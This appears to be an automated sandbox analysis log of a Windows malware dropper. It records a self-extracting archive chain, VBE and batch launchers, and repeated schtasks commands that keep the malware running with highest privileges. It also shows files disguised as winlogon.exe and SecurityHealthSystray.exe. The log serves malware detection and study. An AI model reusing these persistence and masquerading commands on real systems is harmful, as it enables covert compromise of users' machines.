                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe
                                 Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe File created: C:\Users\user\AppData\Roaming\msBroker
                                 Source: C:\Recovery\winlogon.exe Mutant created: NULL
                                 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                                 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
                                 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
                                 Source: C:\Recovery\winlogon.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-wSLzwx2vNs3ciNJLvHL2
                                 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
                                 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
                                 Source: C:\Users\user\Desktop\H9gMIu2HXi.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0
                                 Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                                 Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Command line argument: sfxname 0_2_00A3F05C
                                 Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Command line argument: sfxstime 0_2_00A3F05C
                                 Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Command line argument: STARTDLG 0_2_00A3F05C
                                 Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Command line argument: sfxname 3_2_0032F05C
                                 Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Command line argument: sfxstime 3_2_0032F05C
                                 Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Command line argument: p05 3_2_0032F05C
                                 Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Command line argument: STARTDLG 3_2_0032F05C
                                 Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Command line argument: sfxname 4_2_0073DF1E
                                 Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Command line argument: sfxstime 4_2_0073DF1E
                                 Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Command line argument: STARTDLG 4_2_0073DF1E
                                 Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Command line argument: xzw 4_2_0073DF1E
                                 Source: H9gMIu2HXi.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                 Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: H9gMIu2HXi.exeVirustotal: Detection: 60%
                                Source: H9gMIu2HXi.exeReversingLabs: Detection: 42%
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeFile read: C:\Users\user\Desktop\H9gMIu2HXi.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\H9gMIu2HXi.exe "C:\Users\user\Desktop\H9gMIu2HXi.exe"
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe"
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe"
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe"
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                Source: unknownProcess created: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatewebSession" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                Source: unknownProcess created: C:\Recovery\winlogon.exe C:\Recovery\winlogon.exe
                                Source: unknownProcess created: C:\Recovery\winlogon.exe C:\Recovery\winlogon.exe
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
                                Source: unknownProcess created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe "C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe"
                                Source: unknownProcess created: C:\Recovery\winlogon.exe "C:\Recovery\winlogon.exe"
                                Source: C:\Recovery\winlogon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Recovery\winlogon.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdDJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" Jump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Users\user\Desktop\H9gMIu2HXi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDirectory created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDirectory created: C:\Program Files\Windows Multimedia Platform\8de7bf56f754b7Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDirectory created: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exeJump to behavior
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exeDirectory created: C:\Program Files\Microsoft Office 15\8de7bf56f754b7Jump to behavior
                                Source: H9gMIu2HXi.exeStatic file information: File size 1811992 > 1048576
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: H9gMIu2HXi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Source: H9gMIu2HXi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: H9gMIu2HXi.exe, work.exe.0.dr, dwartg.exe.3.dr
                                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.pdb source: SurrogatewebSession.exe, 00000008.00000002.1734602264.00000000036B9000.00000004.00000800.00020000.00000000.sdmp
                                Source: H9gMIu2HXi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: H9gMIu2HXi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: H9gMIu2HXi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: H9gMIu2HXi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: H9gMIu2HXi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, sgG.cs | .Net Code: method_0 System.Reflection.Assembly.Load(byte[])
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class4.cs | .Net Code: H86
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, sgG.cs | .Net Code: method_0 System.Reflection.Assembly.Load(byte[])
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class4.cs | .Net Code: H86
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4597250
Source: H9gMIu2HXi.exe | Static PE information: section name: .didat
Source: work.exe.0.dr | Static PE information: section name: .didat
Source: dwartg.exe.3.dr | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A407F0 push ecx; ret 0_2_00A40803
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A3FEFC push eax; ret 0_2_00A3FF1A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_003307F0 push ecx; ret 3_2_00330803
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_0032FEFC push eax; ret 3_2_0032FF1A
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0073F640 push ecx; ret 4_2_0073F653
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0073EB78 push eax; ret 4_2_0073EB96
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BABFB02 pushad ; ret 8_2_00007FFD9BABFB03
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BAB8163 push ebx; ret 8_2_00007FFD9BAB816A
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BC21EE0 pushfd ; ret 8_2_00007FFD9BC21EE1
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BC30185 push ebx; retf 8_2_00007FFD9BC301F2
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Code function: 8_2_00007FFD9BC28951 push 8B485E2Eh; iretd 8_2_00007FFD9BC28956
Source: C:\Recovery\winlogon.exe | Code function: 43_2_00007FFD9BACFB02 pushad ; ret 43_2_00007FFD9BACFB03
Source: C:\Recovery\winlogon.exe | Code function: 43_2_00007FFD9BAC8163 push ebx; ret 43_2_00007FFD9BAC816A

Persistence and Installation Behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Users\user\Desktop\tnEMlbYs.log
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File created: C:\Recovery\winlogon.exe
